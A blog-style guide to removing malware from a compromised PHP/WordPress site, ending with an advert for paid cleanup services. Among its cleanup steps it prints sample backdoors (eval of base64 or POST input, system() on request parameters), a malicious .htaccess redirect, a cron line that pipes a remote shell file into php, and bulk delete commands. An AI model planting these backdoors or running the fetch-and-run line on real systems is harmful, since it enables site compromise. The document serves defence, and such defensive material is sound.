Remove or Clean the Infected Code
After identifying that there is malware or suspicious code on your website, the next step is to remove and clean it to return the website to a safe state. Cleaning code requires care, because if you delete a required system file, the website may stop working.
Below is a complete step-by-step guide.
🟣 1. Back Up First
Before doing anything, make a backup of the website:
cp -r /var/www/html /var/www/html-backup
A backup is important because:
If you delete something by mistake, you can restore it.
Malware cleanup sometimes causes conflicts.
🟣 2. Delete Suspicious Files (Fast and Safe)
If you have found a file that should not be there, such as:
shell.php
mailer.php
b374k.php
wso2.php
test123.php
Delete it immediately:
rm /var/www/html/filename.php
Or delete all never-used files by size:
find /var/www/html -name "*.php" -size -5k -delete
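⚠️ Do not delete system files without checking their content. The size-based command above deletes every small PHP file it matches, legitimate ones included, so run it without -delete first and review the list.
🟣 3. Clean Malicious Code Inside a File (Clean Without Deleting the File)
Sometimes malware has been injected into a legitimate file such as: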
index.php
wp-config.php
header.php
functions.php
config.php
Example 1: Malicious encoded code
<?php
eval(base64_decode("aWYoIWZ1bm..."));
?>
👉 How to clean it
Remove the malicious code block entirely:
<?php
// Cleaned: malicious code removed
?>
Example 2: Hidden backdoor via system()
Malware:
<?php
if(isset($_REQUEST['cmd'])){
system($_REQUEST['cmd']);
}
?>
Solution:
<?php
// CLEANED: backdoor removed
?>
Example 3: Strange POST/COOKIE executors
<?php
$code = $_POST['evil'];
eval($code);
Remove immediately:
<?php
// CLEANED
?>
🟣 4. Fix Core Files Using CMS Tools (WordPress, Joomla, etc.)
WordPress
wp core verify-checksums
wp core download --force
This restores the original core files, free of malware.
🟣 5. Use ClamAV to Remove Infected Files
clamscan -r --remove /var/www/html
Suitable for:
PHP shells
Infected uploads
Scripts that carry a malware signature
🟣 6. Clean .htaccess Malware
Attackers often insert redirects into .htaccess.
Malware example:
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} .*google.* [NC]
RewriteRule ^(.*)$ http://malicious-site.com [L]
👉 Delete these and keep the original .htaccess:
# CLEAN .htaccess
🟣 7. Remove Suspicious Cron Jobs
Many malware strains try to reinstall themselves through CRON.
Check CRON
crontab -l
Delete suspicious jobs
crontab -e
Delete entries such as:
* * * * * curl http://bad-site.com/shell.txt | php
🟣 8. Check Uploaded Files Folder
Hackers like to hide:
.php files
.phtml files
Hidden scripts
In uploads/, images/, documents/
Quickly find PHP files inside uploads
find /var/www/html/wp-content/uploads -name "*.php"
Delete any that do not belong to the system.
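A review-first pass over the web root that lists files matching the patterns from steps 3, 6 and 8 without deleting anything. This is an added example, not part of the original post; the function names, output labels and sample tree are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example: report files for manual review; nothing is deleted.

# Shapes from step 3: eval(base64_decode(...)), eval($var), system($_REQUEST[...]).
PHP_PATTERNS='eval[[:space:]]*\([[:space:]]*(base64_decode|\$)|system[[:space:]]*\([[:space:]]*\$_(REQUEST|POST|GET|COOKIE)'

scan_webroot() {
  local root=$1
  # Step 3: executor patterns injected into PHP files.
  grep -rlE --include='*.php' --include='*.phtml' "$PHP_PATTERNS" "$root" 2>/dev/null |
    sed 's/^/INJECTED-CODE /'
  # Step 8: scripts have no business under an uploads directory.
  find "$root" -type f -path '*/uploads/*' \( -name '*.php' -o -name '*.phtml' \) |
    sed 's/^/SCRIPT-IN-UPLOADS /'
  # Step 6: .htaccess rewrite conditions keyed on the visitor's User-Agent.
  find "$root" -type f -name '.htaccess' \
    -exec grep -lE 'RewriteCond[[:space:]]+%\{HTTP_USER_AGENT\}' {} + |
    sed 's/^/UA-REDIRECT /'
}

# Constructed sample web root (assumption: WordPress-style layout) for a dry run.
make_sample_tree() {
  local d
  d=$(mktemp -d)
  mkdir -p "$d/wp-content/uploads/2024"
  printf '%s\n' '<?php echo "hello"; ?>' > "$d/index.php"   # small but legitimate
  printf '%s\n' '<?php eval(base64_decode("Y29uc3RydWN0ZWQ=")); ?>' > "$d/header.php"
  printf '%s\n' '<?php if(isset($_REQUEST["cmd"])){ system($_REQUEST["cmd"]); } ?>' \
    > "$d/functions.php"
  printf '%s\n' '<?php // constructed placeholder ?>' \
    > "$d/wp-content/uploads/2024/img.php"
  printf '%s\n' 'RewriteEngine On' \
    'RewriteCond %{HTTP_USER_AGENT} .*google.* [NC]' > "$d/.htaccess"
  echo "$d"
}

# Usage: ./scan.sh /var/www/html
if [ -n "${1:-}" ]; then
  scan_webroot "$1"
fi
```

The sample index.php is tiny and clean, so it is not reported; a size-based delete cannot make that distinction.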
🟣 9. Re-upload Clean Theme/Plugin Files
If the damage is extensive, the best step is:
Download the original theme/plugin
Overwrite the infected one
This is proven to be safer than trying to clean manually.
🟣 10. Check File Permissions and Fix Them
Infected sites often have 777 permissions.
Set recommended permissions
find /var/www/html -type d -exec chmod 755 {} \;
find /var/www/html -type f -exec chmod 644 {} \;
🟣 11. Final Scan After Cleaning
Scan again to make sure no malware remains.
clamscan -r /var/www/html
rkhunter --check
chkrootkit
🧩 Conclusion
Cleaning infected code requires:
Calm
Backup
Scanning
Manual cleanup
Core file replacement
If you follow these steps, you will remove all the malware cleanly without breaking the website.
📞 Need Malware Cleaning / Complete Security Hardening?
I can help you 100%:
Malware removal
File scanning
Core file integrity fixes
Server hardening
Protection so your website is not reinfected
📞 WhatsApp: https://wa.me/255693118509
🌐 Website: https://www.faulink.com